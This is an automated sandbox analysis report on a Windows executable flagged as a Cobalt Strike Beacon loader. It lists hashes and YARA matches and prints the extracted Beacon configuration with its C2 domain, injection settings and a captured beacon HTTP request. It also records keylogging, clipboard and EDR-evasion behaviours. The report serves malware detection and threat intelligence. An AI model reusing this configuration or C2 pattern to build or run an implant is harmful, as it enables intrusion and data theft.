Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Analysis ID: 1428763
MD5: c720c50306558112b389ef44cff494f1
SHA1: 476f36c3f3a3aa0141b481fb683d3c0cbd767def
SHA256: 6b655ddf0b5cda5d24b62d2f387e0f83e57b7a931f55f49ad274b002c1a68b23
Tags: exe
Infos:

Detection

CobaltStrike
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Sets debug register (to hijack the execution of another thread)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cleanup
Malware family (Name, Description, Attribution, Blogpost URLs, Link)

Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 62, "MaxGetSize": 2796804, "Jitter": 81, "C2Server": "easthoolbook.com,/sign.mpeg", "HttpPostUri": "/flexible", "Malleable_C2_Instructions": ["Remove 600 bytes from the beginning", "Base64 decode", "NetBIOS decode 'A'"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpresult.exe", "Spawnto_x64": "%windir%\\sysnative\\gpresult.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 12345, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 22918, "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"], "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source | Rule | Description | Author (matched strings listed beneath each rule)
00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_ee756db7 | Attempts to detect Cobalt Strike based on strings found in BEACON | unknown
  • 0x760:$a39: %s as %s\%s: %d
  • 0xfa12:$a41: beacon.x64.dll
  • 0x1970:$a46: %s (admin)
  • 0x8c0:$a48: %s%s: %s
  • 0x78c:$a50: %02d/%02d/%02d %02d:%02d:%02d
  • 0x7b8:$a50: %02d/%02d/%02d %02d:%02d:%02d
  • 0x19b9:$a51: Content-Length: %d
00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_CobaltStrike_b54b94ac | Rule for beacon sleep obfuscation routine | unknown
  • 0x1017b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
            Source | Rule | Description | Author (matched strings listed beneath each rule)
            0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack | JoeSecurity_CobaltStrike | Yara detected CobaltStrike | Joe Security
            0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack | JoeSecurity_CobaltStrike_3 | Yara detected CobaltStrike | Joe Security
            0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack | Windows_Trojan_CobaltStrike_663fc95d | Identifies CobaltStrike via unidentified function code | unknown
              • 0x189f8:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
            0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack | Windows_Trojan_CobaltStrike_b54b94ac | Rule for beacon sleep obfuscation routine | unknown
              • 0x3a97b:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
            No Sigma rule has matched
            No Snort rule has matched

            AV Detection

            Source: 00000000.00000003.2073190217.000000000208E000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: CobaltStrike (configuration identical to the malware configuration listed above)
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, ReversingLabs: Detection: 25%
            Source: unknown, HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, Code function: 0_2_000000014003C388 GetFullPathNameW, PathIsUNCW, GetVolumeInformationW, CharUpperW, FindFirstFileW, FindClose

            Networking

            Source: Malware configuration extractor, URLs: easthoolbook.com
            Source: Joe Sandbox View, ASN Name: AVANTI-UK-ASGB AVANTI-UK-ASGB
            Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global traffic, HTTP traffic detected:
              GET /sign.mpeg?dare=true HTTP/1.1
              Host: easthoolbook.com
              Accept: application/xml
              Cookie: ouid=anIvNW9kUjJIbHJDUVQ0ZWdmVG04UFVUUzhNeDJ5NEhkaDIrTmYxS0t0ZjZQRjVmeXluSnI2RXZWWkhxU3NpMTVEREZmRHB1Q2w3c053WVFKYjdpRDBqVk0rak9Na0VkQmNZaUlONkMxNENOb0VCRlVKa1U4Q05EcENBdE04b3MrU1lTcXcraHk0ekFrYitzK2IvSzBQdzdDV25ISXIrOWptMVE4T0RNM1IwPQ==
              User-Agent: Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
              Connection: Close
              Cache-Control: no-cache
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown - DNS traffic detected: queries for: easthoolbook.com
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151387101.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3218783983.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2151112670.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3188931002.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2468168029.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3261508325.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2245218172.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3099234815.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.00000000004A2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2092109726.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2181153623.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.3051105235.000000000313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212647131.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2212324717.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2334675503.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2396331476.000000000048A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.000000000051B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/sign.mpeg?dare=true
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easthoolbook.com/v
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49699 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49746 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 89.150.57.46:443 -> 192.168.2.6:49748 version: TLS 1.2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140145214 SrcHashImpl::SrcHashImpl,CreateCompatibleDC,CreateCompatibleBitmap,FillRect,OpenClipboard,EmptyClipboard,CloseClipboard,SetClipboardData,CloseClipboard,0_2_0000000140145214
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140158178 GetAsyncKeyState,0_2_0000000140158178
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400B4288 GetKeyState,GetKeyState,GetKeyState,GetParent,GetParent,SendMessageW,ScreenToClient,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,SendMessageW,GetParent,0_2_00000001400B4288
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014013D824 GetKeyState,GetKeyState,GetKeyState,0_2_000000014013D824

            System Summary

            Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon sleep obfuscation routine Author: unknown
            Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_3_01FC0020 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtProtectVirtualMemory,0_3_01FC0020
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: String function: 0000000140200750 appears 186 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: String function: 000000014003443C appears 45 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: String function: 00000001400064B0 appears 41 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: String function: 000000014002C650 appears 79 times
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeBinary or memory string: OriginalFilenameSBCommandLineScanner.exeJ vs SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
            Source: 00000000.00000002.3315812932.00000000020A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: classification engineClassification label: mal92.troj.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance,0_2_0000000140054158
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014005876C GetModuleHandleW,GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc,0_2_000000014005876C
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeReversingLabs: Detection: 25%
